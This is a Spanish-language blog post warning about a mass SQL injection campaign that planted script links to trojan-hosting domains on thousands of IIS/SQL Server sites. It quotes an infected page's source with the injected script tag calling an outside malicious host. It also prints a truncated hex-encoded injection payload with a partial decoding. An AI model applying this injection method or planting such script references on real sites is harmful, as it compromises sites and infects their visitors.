Apareció una noticia en Security Magazine y VirusBulletin de que varios miles de sitios legítimos han sido afectados por un ataque de inyección de código SQL; al parecer sitios como algunos bajo la responsabilidad de Naciones Unidas o el gobierno británico fueron exitosamente infectados.

Una vez que se ha efectuado la inyección de código, el sitio legítimo redirige al usuario a sitios maliciosos para que se intente bajar un troyano. Los sitios maliciosos son: nmidahena.com, aspder.com y nihaorr1.com; esto puede cambiar porque de hecho estos sitios ya no están en línea.

Ejercicio sencillo de Comprobación:
Si buscan en Google por “script src http nmidahena.com” o “script src http nihaorr1.com”, encontrarán miles de sitios que fueron inyectados con código. Posteriormente ingresan al sitio y en su navegador le ponen “Ver Código Fuente” para que observen el código de la página web. Una vez hecho esto, buscan por “nmidahena, aspder o nihaorr1″; Vale la pena que chequen los suyos, espero no se lleven una sorpresa.

Por ejemplo, el sitio “http://www.sssri.com/websiteenglish/default.asp” aún sigue afectado, en el código fuente de su página web se observa (al día de hoy) la referencia al sitio “nmidahena.com”:

<html>
<head>
<meta http-equiv=Content-Type content=text/html; charset=gb2312>
<title>Shanghai Ship and Shipping Res<script src=http://www.nmidahena.com/1.js></script></title>
<script language=javascript >
function JumpDef()
{
window.location.href="../home.htm";
}
</script>
<style>

Lo unico bueno es que estos ataques solo estan dirigidos a sitios con Microsoft IIS con backend de Microsoft SQL SERVER segun http://www.f-secure.com/ el codigo inicia asi(ojo este codigo no esta completo):

DECLARE%20@S%20NVARCHAR(4000);SET%20@S=CAST(0x440045004300
   4C00410052004500200040005400200076006100720063006800610072
   00280032003500350029002C0040004300200076006100720063006800
   610072002800320035003500290020004400450043004C004100520045
   0020005400610062006C0065005F0043007500720073006F0072002000
   43005500520053004F005200200046004F0052002000730065006C0065
   0063007400200061002E006E0061006D0065002C0062002E006E006100
   6D0065002000660072006F006D0020007300790073006F0062006A0065
   00630074007300200061002C0073007900730063006F006C0075006D00
   6E00730020006200200077006800650072006500200061002E00690064
   003D0062002E0069006400200061006E006400200061002E0078007400
   7900700065003D00270075002700200061006E0064002000280062002E
   00780074007900700065003D003900390020006F007200200062002E00
   780074007900700065003D003300350020006…

El cual al momento de ser decodificado resulta en:

DECLARE @T varchar(255)'@C varchar(255) DECLARE Table_Cursor
   CURSOR FOR select a.name'b.name from sysobjects a'syscolumns b
   where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35
   or b…

Lo que se obtiene es que encuentra los campos de tipo texto en la base de datos y agrega un link al javascript malicioso a todos y cada uno de ellos lo que causara que los desplieguen automaticamente.
Esencialmente los atacantes buscan paginas ASO o ASPX conteniendo cualquier tipo de querystring e intentan utilizarlo para hacer el upload de su codigo de insercion de SQL.

3 Respuestas para “Ataque masivo de Inyección SQL”

  1. rEKosPoll
    desde Argentina Dijo:

    PXLZ TEAM
    /rEKosPoll\
    THE BEST TEAM HACKER IN THE WORLD

    Responder

  2. marco
    desde Mexico Dijo:

    muy buena pagina e carnal felicidades
    la voy a visitar diario no mejor aun la voya agregar a mi

    Responder

  3. Ruben Omar
    desde Mexico Dijo:

    Gracias por el comentario k

    Responder

Responder